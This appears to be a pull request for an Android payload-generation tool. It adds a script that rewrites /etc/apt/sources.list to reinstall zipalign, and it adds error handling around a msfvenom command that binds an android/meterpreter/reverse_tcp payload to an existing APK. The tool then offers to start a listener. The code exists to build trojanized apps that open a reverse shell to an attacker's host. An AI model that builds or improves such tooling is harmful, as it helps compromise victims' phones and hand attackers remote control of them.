### PR TITLE
Implement user-consented Zipalign error handling

### DIFF
--- a/ZipalignReinstallTool.py
+++ b/ZipalignReinstallTool.py
@@ -1,0 +1,83 @@
+import subprocess
+import shutil
+import os
+def main():
+
+    def run_command(command):
+        """Run a shell command and print its output."""
+        print(f"Executing: {command}")
+        try:
+            proc = subprocess.run(command, shell=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+            print(proc.stdout)
+            if proc.returncode != 0:
+                print(f"Command failed with return code {proc.returncode}")
+                return False
+            return True
+        except Exception as e:
+            print(f"Error executing command: {e}")
+            return False
+
+    # Define paths
+    sources_list = "/etc/apt/sources.list"
+    backup_file = "sources.backup"
+
+    # Step 1: Force purge uninstall zipalign
+    if not run_command("apt-get purge zipalign --auto-remove -y"):
+        print("Error purging zipalign. Exiting.")
+        exit(1)
+
+    # Step 2: Backup the sources.list file
+    try:
+        print(f"Backing up {sources_list} to {backup_file}")
+        shutil.copy(sources_list, backup_file)
+    except Exception as e:
+        print(f"Failed to back up {sources_list}: {e}")
+        exit(1)
+
+    # Step 3: Clear the sources.list file
+    try:
+        print(f"Clearing {sources_list}")
+        with open(sources_list, "w") as file:
+            file.write("")
+    except Exception as e:
+        print(f"Failed to clear {sources_list}: {e}")
+        exit(1)
+
+    # Step 4: Add new repository
+    new_repo = "deb http://ftp.de.debian.org/debian buster main"
+    try:
+        print(f"Adding '{new_repo}' to {sources_list}")
+        with open(sources_list, "w") as file:
+            file.write(new_repo + "\n")
+    except Exception as e:
+        print(f"Failed to write to {sources_list}: {e}")
+        exit(1)
+
+    # Step 5: Run apt update
+    if not run_command("apt update"):
+        print("Error updating apt. Reverting changes.")
+        shutil.copy(backup_file, sources_list)
+        exit(1)
+
+    # Step 6: Install zipalign
+    if not run_command("apt install zipalign -y"):
+        print("Error installing zipalign. Reverting changes.")
+        shutil.copy(backup_file, sources_list)
+        exit(1)
+
+    # Step 7: Revert sources.list from the backup
+    try:
+        print(f"Restoring {sources_list} from {backup_file}")
+        shutil.copy(backup_file, sources_list)
+    except Exception as e:
+        print(f"Failed to restore {sources_list} from backup: {e}")
+        exit(1)
+
+    # Final update after restoring original sources.list
+    if not run_command("apt update"):
+        print("Warning: Final apt update failed.")
+
+    print("Script execution completed successfully.")
+
+if __name__ == "__main__":
+    main()

--- a/no1seandro.py
+++ b/no1seandro.py
@@ -6,6 +6,8 @@ import shutil
 import stat
 import subprocess
 import apt
+import subprocess
+import ZipalignReinstallTool
 
 init(autoreset=True)
 
@@ -131,12 +133,33 @@ def generate_payload():
     apkname = input(Fore.YELLOW + "Enter the App/apk name: ")
     print(Fore.CYAN + "Creating APK Please wait...")
     #Replace example.apk with the apk you want to bind the payload to.
-    os.system(f"msfvenom -x example.apk -p android/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -o {apkname}.apk")
-  
+    try:
+        cmd = f"msfvenom -x example.apk -p android/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -o {apkname}.apk"
+        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
+
+        err = proc.stderr.read()
+        if err:
+            if "Unable to align apk with zipalign" in err:
+                print(Fore.RED + "Error: Unable to align apk with zipalign.")
+                choice = input(Fore.YELLOW + "Do you want to run the ZipalignReinstallTool to fix this? (Y/N): ")
+                if choice.upper() == 'Y':
+                    print(Fore.CYAN + "Running ZipalignReinstallTool to resolve the issue...")
+                    ZipalignReinstallTool.main()
+                    time.sleep(1)
+                    menu()
+                else:
+                    print(Fore.YELLOW + "Skipping ZipalignReinstallTool. Exiting...")
+                    time.sleep(2)
+                    exit(1)
+    except Exception as e:
+        print(Fore.RED + f"An unexpected error occurred: {e}")
+        time.sleep(2)
+        exit(1)
+
     clear_with_style()
     print(Fore.GREEN + f"APK payload generated successfully saved as {apkname}.apk")
-    listencho = input(Fore.YELLOW + "Would you like to listen?(Y/N): ")
-    if listencho == "Y":
+    listencho = input(Fore.YELLOW + "Would you like to listen? (Y/N): ")
+    if listencho.upper() == "Y":
         set_listener()
     else:
         menu()


### PR DESCRIPTION
This commit introduces error handling for `zipalign` failures during APK payload generation. In case of a `zipalign` alignment error, the user is now prompted to run `ZipalignReinstallTool.py` for resolving the issue. The script execution is contingent upon user consent, enhancing the process's transparency and control. This fix addresses potential disruptions in payload generation due to `zipalign` misconfigurations or failures.